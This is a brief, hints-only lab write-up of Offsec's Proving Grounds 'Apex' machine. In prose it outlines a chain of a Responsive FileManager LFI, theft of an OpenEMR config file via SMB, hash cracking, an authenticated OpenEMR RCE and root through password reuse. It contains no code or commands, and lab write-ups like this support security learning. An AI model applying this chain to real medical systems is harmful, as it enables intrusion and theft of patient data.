Apex Proving Grounds Write-Up
SUMMARY
This write-up covers the Apex machine from Offsec’s Proving Grounds, a Linux machine chaining a file manager LFI with an OpenEMR RCE and credential reuse for root.
Port 80 hosted a hospital web application. Directory fuzzing revealed a Responsive FileManager v9.13.4 panel, vulnerable to Local File Inclusion. An OpenEMR 5.0.1 login was also discovered. OpenEMR’s GitHub repository was consulted to locate the SQL configuration file path; the LFI was used to extract it and deposit it in a readable location. The file was not accessible via the file manager but was readable through the exposed SMB share. The file contained hardcoded database credentials, which were used to query MySQL and extract the admin password hash. Hashcat cracked it, granting access to the OpenEMR panel.
A searchsploit exploit for OpenEMR provided authenticated RCE and a shell as www-data. The cracked password was reused for the root account, completing the machine.
PATH TO FOLLOW
- Reconnaissance & Responsive FileManager + OpenEMR Discovery
- LFI Exploitation → SQL Config File Extraction via SMB
- MySQL Admin Hash Extraction & Hashcat Crack
- OpenEMR Admin Login & RCE Exploit → Shell as
www-data - Cleartext Password Reuse → Shell as Root
Due to OffSec’s policy on content sharing, these write-ups will provide hints only rather than full solutions.I know, boring stuff.